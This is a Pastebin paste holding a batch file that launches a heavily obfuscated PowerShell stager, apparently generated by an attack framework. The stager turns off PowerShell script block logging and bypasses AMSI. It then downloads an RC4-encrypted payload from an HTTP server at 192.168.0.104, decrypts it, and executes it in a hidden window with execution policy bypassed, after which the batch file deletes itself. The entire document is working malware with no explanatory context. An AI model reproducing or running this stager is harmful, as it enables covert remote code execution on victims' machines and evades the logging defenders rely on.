Advertisement
akimc

Untitled

Jun 25th, 2019
106
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.59 KB | None | 0 0
  1. @echo off
  2. start /b CMD.eXe /c"sET kzhJx= Set-ITeM ('vAR'+'i'+'aBLe:wT0a') ( [tYpE]("{10}{6}{3}{4}{2}{12}{8}{7}{11}{0}{5}{1}{9}" -f 'y[stRINg','JE','s.g','I','on',',sYSTEM.ob','eCt','Tiona','Ic','cT','cOlL','R','enERic.d') ); $rY4 = [TypE]("{0}{1}{3}{2}" -F 'S','CRi','TBLOcK','P') ;$8Fub = [tyPe]("{0}{1}"-F'R','eF') ; $l3xP =[TYPE]("{6}{0}{1}{5}{3}{4}{2}"-f 'Stem','.net.','R','rViCEPoInTManag','e','SE','SY'); $xA17D= [TYPE]("{1}{0}{4}{3}{5}{2}" -f'eM.NE','SYsT','T','EbRe','t.w','ques') ; $4RGL = [TypE]("{4}{3}{1}{0}{2}"-F'nTi','e','aLcaCHe','T.CreD','SYstEM.NE') ; seT-iTEM ('VarIab'+'l'+'e:Jmn'+'4') ([TyPe]("{1}{3}{2}{0}" -f 'DinG','Sy','.enCO','steM.TExt')); IF(${pSvERSi`onTA`B`le}."PsVER`sI`ON"."mA`jOr" -ge 3){${G`Pf}= (chIlDiTEM vARiabLe:8fub ).ValUe."a`SsEmb`Ly".("{1}{0}" -f'e','GETTyp').Invoke(("{4}{0}{1}{3}{2}{5}{7}{8}{6}" -f 'ystem.M','ana','om','gement.Aut','S','ati','ls','o','n.Uti'))."GETFie`Ld"(("{0}{1}{5}{3}{2}{6}{4}{7}" -f'cache','d','S','oupPolicy','tt','Gr','e','ings'),'N'+("{0}{3}{1}{2}{4}" -f 'onPubl',',S','tati','ic','c'));IF(${g`Pf}){${G`PC}=${g`pF}.("{2}{0}{1}"-f 'V','aLue','Get').Invoke(${n`ULL});If(${G`PC}[("{0}{2}{1}"-f'S','ptB','cri')+("{2}{0}{1}" -f 'oggin','g','lockL')]){${G`Pc}[("{1}{0}"-f'tB','Scrip')+("{0}{2}{3}{1}" -f 'l','ng','ockL','oggi')][("{0}{2}{1}" -f 'Enabl','iptB','eScr')+("{1}{2}{0}" -f'Logging','loc','k')]=0;${g`pc}[("{0}{2}{1}"-f 'Sc','iptB','r')+("{0}{1}{2}{3}" -f 'lockLo','g','gin','g')][("{3}{10}{5}{8}{1}{2}{9}{6}{7}{0}{4}" -f 'ionLo','crip','tBlo','E','gging','ble','o','cat','S','ckInv','na')]=0}${v`Al}= $wT0A::("{0}{1}"-f'n','Ew').Invoke();${v`AL}.("{1}{0}" -f 'Dd','A').Invoke(("{1}{2}{0}{3}"-f'ript','Enab','leSc','B')+("{1}{0}{2}"-f 'kLog','loc','ging'),0);${v`Al}.("{1}{0}"-f 'D','Ad').Invoke(("{3}{2}{0}{8}{7}{9}{1}{4}{5}{6}"-f 'e','tBlo','abl','En','c','k','InvocationLogging','r','Sc','ip'),0);${G`pc}[((("{6}{0}{11}{8}{4}{9}{5}{15}{12}{7}{10}{2}{1}{3}{13}{16}{14}" -f 'Y_LO','esmFoMicrosoftm','ici','FoWind','I','Em','HKE','mF','AL_MACH','N','oPol','C','are','o','riptB','FoSoftw','wsmFoPowerShellmFoSc'))."rEp`lA`ce"(([cHaR]109+[cHaR]70+[cHaR]111),'\'))+("{2}{0}{1}" -f 'gg','ing','lockLo')]=${V`Al}}ELsE{ $ry4."GeTFIe`LD"(("{0}{1}{2}" -f 'sign','a','tures'),'N'+("{2}{3}{0}{1}"-f'blic,St','atic','o','nPu')).("{0}{2}{1}"-f'SETVA','E','LU').Invoke(${N`ULl},(.("{1}{3}{2}{0}"-f'CT','N','-ObjE','ew') ("{5}{3}{0}{1}{4}{2}"-f'lL','ECtIOns.GENERic.','g]','o','HaShSeT[stRIn','C')))} $8fub."a`SsEmBLY".("{1}{0}" -f'ype','GeTT').Invoke(("{10}{9}{0}{8}{11}{2}{5}{3}{7}{1}{6}{4}" -f'nagemen','t','ion','i','ls','.Ams','i','U','t.Aut','tem.Ma','Sys','omat'))^|^&('?'){${_}}^|^&('%'){${_}.("{0}{1}{2}" -f'GE','t','FIeLd').Invoke(("{0}{1}{3}{2}" -f 'amsi','Init','d','Faile'),("{3}{0}{2}{1}"-f'li','atic','c,St','NonPub')).("{0}{1}{2}" -f'S','eTVa','luE').Invoke(${n`ULL},${TR`UE})};}; ( variaBlE l3Xp -vAlUeONLY)::"e`X`peCT100cO`NTI`NUE"=0;${wC}=.("{2}{1}{0}"-f'T','C','NEW-OBJE') ("{0}{1}{3}{2}"-f 'Syst','Em.Net.WeB','EnT','CLI');${U}=(("{6}{10}{9}{0}{2}{3}{1}{8}{4}{7}{5}" -f' WOW64;',';',' Trid','ent/7.0','0','ike Gecko','M',') l',' rv:11.','.0 (Windows NT 6.1;','ozilla/5'));${wc}."HEA`dE`RS".("{0}{1}"-f 'A','DD').Invoke(("{1}{0}{2}" -f'ser-','U','Agent'),${U});${wc}."PR`OxY"= $XA17D::"deFAuLtW`eBp`ROxy";${wc}."pr`OXy"."C`ReDe`NTiAls" = (Get-VariablE ("4R"+"gL") -vALuEOnl )::"d`e`FAul`T`Ne`TW`ORkC`RedEntIaLs";${S`CrI`pt:`pRoXy} = ${WC}."P`RoXY";${K}= ( gEt-ITeM ('vaRiaB'+'l'+'E:jmn'+'4')).valuE::"a`scII".("{0}{1}"-f 'GeTBYT','es').Invoke(((("{6}{4}{1}{5}{2}{3}{0}"-f']DUl8p','qe1-4/h','bkj','%X6',';cN','PVs','7,tLAzVId'))."rEp`L`ACE"(([cHar]65+[cHar]122+[cHar]86),[stRinG][cHar]124)));${r}={${d},${K}=${AR`gs};${S}=0..255;0..255^|^&('%'){${j}=(${j}+${s}[${_}]+${k}[${_}%${k}."cO`Unt"])%256;${S}[${_}],${s}[${j}]=${s}[${j}],${S}[${_}]};${d}^|.('%'){${I}=(${i}+1)%256;${H}=(${h}+${s}[${I}])%256;${S}[${i}],${S}[${h}]=${s}[${H}],${S}[${i}];${_}-BxoR${S}[(${S}[${I}]+${s}[${h}])%256]}};${s`Er}=("{4}{1}{0}{3}{5}{2}"-f '92.168','ttp://1','80','.0.104','h',':');${T}=("{1}{3}{2}{0}" -f'et.php','/a','min/g','d');${wC}."heAD`ERS".("{0}{1}" -f'A','Dd').Invoke(("{2}{0}{1}" -f 'o','okie','C'),("{3}{8}{1}{6}{0}{4}{7}{5}{2}"-f'K','tN','ZLXaNrwUOc=','session','kAAh+N','/','7F','f','=jh3Q'));${Da`TA}=${w`C}.("{1}{2}{3}{0}" -f 'Data','DoWnL','oA','d').Invoke(${S`Er}+${t});${Iv}=${dA`TA}[0..3];${Da`Ta}=${d`ATA}[4..${D`Ata}."l`eNgTh"];-joiN[ChAR[]](^& ${R} ${D`AtA} (${i`V}+${k}))^|^&("{1}{0}"-f 'EX','I') &&SET VEb=EchO Iex (LS ENv:KZHJX).vALuE^| PowerSHelL -winDowStYL hiDDeN -NONiNteRACt -NoPRo -exeCuTIOnpoliC byPaSs -NoEXi -&&CMD.eXe /c %VEB%"
  3. start /b "" cmd /c del "%~f0"&exit /b
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement